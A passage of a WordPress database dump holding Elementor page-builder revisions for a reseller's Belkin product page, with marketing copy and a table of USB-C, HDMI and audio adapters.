class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Mini DisplayPortTM to VGA<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]\\n<\\/center><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Micro HDMI Adapter<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Lightning Audio + Charge RockStar\\u2122<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6685,3269,'_elementor_edit_mode','builder'),(6684,3269,'_wp_page_template','template-fullwidth.php'),(6688,3269,'_elementor_version','2.5.14'),(6691,3270,'_wp_page_template','template-fullwidth.php'),(6692,3270,'_elementor_edit_mode','builder'),(6693,3270,'_elementor_template_type','post'),(6694,3270,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2>\\n<h4><\\/h4>\\n<h3>Innovation, with quality at its core<\\/h3>\\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\\n<h3>Global leader in tech.<\\/h3>\\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\\n<h3>Always looking to the future<\\/h3>\\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.\\n<h3>An unwavering commitment to earning your trust.<\\/h3>\\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.\\n<h3>Unmatched performance, every time<\\/h3>\\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\\n<h3>We believe good design matters.<\\/h3>\\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\\n\\n<center>[maxbutton id=\\\"1\\\" ]<\\/center>\\n<h3>Product\\u00a0 : -<\\/h3>\\n<table>\\n<tbody>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n\\n\\n\\n\\n\\n<strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/>\\n\\n<strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Mini DisplayPortTM to VGA<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]\\n<\\/center><\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Micro HDMI Adapter<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<\\/tr>\\n<tr>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<td width=\\\"150\\\"><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/>\\n\\n<strong>Lightning Audio + Charge RockStar\\u2122<\\/strong>\\n\\n<center>[maxbutton id=\\\"9\\\" ]<\\/center>\\n<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6695,3270,'_elementor_version','2.5.14'),(6705,3272,'_wp_page_template','template-fullwidth.php'),(6706,3272,'_elementor_edit_mode','builder'),(6707,3272,'_elementor_template_type','post'),(6708,3272,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2><h4>\\u00a0<\\/h4><h3>Innovation, with quality at its core<\\/h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.<\\/p><h3>Global leader in tech.<\\/h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.<\\/p><h3>Always looking to the future<\\/h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.<\\/p><h3>An unwavering commitment to earning your trust.<\\/h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.<\\/p><h3>Unmatched performance, every time<\\/h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.<\\/p><h3>We believe good design matters.<\\/h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.<\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p><h3>Product\\u00a0 : -<\\/h3><table><tbody><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>\\u00a0<\\/strong><\\/p><p><strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong><\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/><\\/p><p><strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Mini DisplayPortTM to VGA<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Micro HDMI Adapter<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Lightning Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6709,3272,'_elementor_version','2.5.14'),(6719,3274,'_wp_page_template','template-fullwidth.php'),(6720,3274,'_elementor_edit_mode','builder'),(6721,3274,'_elementor_template_type','post'),(6712,3273,'_wp_page_template','template-fullwidth.php'),(6713,3273,'_elementor_edit_mode','builder'),(6714,3273,'_elementor_template_type','post'),(6715,3273,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2><h4>\\u00a0<\\/h4><h3>Innovation, with quality at its core<\\/h3><p>For 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.<\\/p><h3>Global leader in tech.<\\/h3><p>With two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.<\\/p><h3>Always looking to the future<\\/h3><p>Technology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure we\\u2019re ready and you\\u2019re covered, no matter what the future holds.<\\/p><h3>An unwavering commitment to earning your trust.<\\/h3><p>Our rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work \\u2013 that\\u2019s why we back our products with robust warranties.<\\/p><h3>Unmatched performance, every time<\\/h3><p>We know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.<\\/p><h3>We believe good design matters.<\\/h3><p>The Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"1\\\" ]<\\/center><p>\\u00a0<\\/p><h3>Product\\u00a0 : -<\\/h3><table><tbody><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2329\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>\\u00a0<\\/strong><\\/p><p><strong>3.1 USB-A to USB-C\\u2122 Cable\\uff08USB Type-C\\u2122\\uff09<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2330\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.1000.1000.jpeg\\\" alt=\\\"\\\" width=\\\"1000\\\" height=\\\"1000\\\" \\/><\\/p><p><strong>Ultra HD High Speed HDMI\\u00ae Cable<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2331\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/372.png\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Gold-Plated High-Speed HDMI Cable with Ethernet 4K\\/Ultra HD Compatible<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2332\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-1.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Mini DisplayPortTM to VGA<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2334\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-2.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Micro HDMI Adapter<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2335\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-3.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB A\\/B Device Cable * A\\/B DSTP<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2336\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-4.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.5 mm Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2337\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-5.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to Gigabit Ethernet Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td><\\/tr><tr><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2338\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-6.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>3.0 USB-C\\u2122 to USB-A Adapter (USB Type-C\\u2122)<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2339\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-7.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (USB Type-C)<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2340\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/webdam.web_.372.372.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>USB-C\\u2122 to HDMI\\u00ae Adapter (supports Dolby Vision)<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><center><\\/center><\\/td><td width=\\\"150\\\"><p><img class=\\\"alignnone size-full wp-image-2341\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/cq5dam.web_.372.372-8.jpeg\\\" alt=\\\"\\\" width=\\\"372\\\" height=\\\"372\\\" \\/><\\/p><p><strong>Lightning Audio + Charge RockStar\\u2122<\\/strong><\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center><\\/center><center>[maxbutton id=\\\"9\\\" ]<\\/center><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6716,3273,'_elementor_version','2.5.14'),(6722,3274,'_elementor_data','[{\"id\":\"118b9d28\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"34822abf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3af7701d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>THE BELKIN DIFFERENCE<\\/h2>\\n<h4><\\/h4>\\n<h3>Innovation, with quality at its 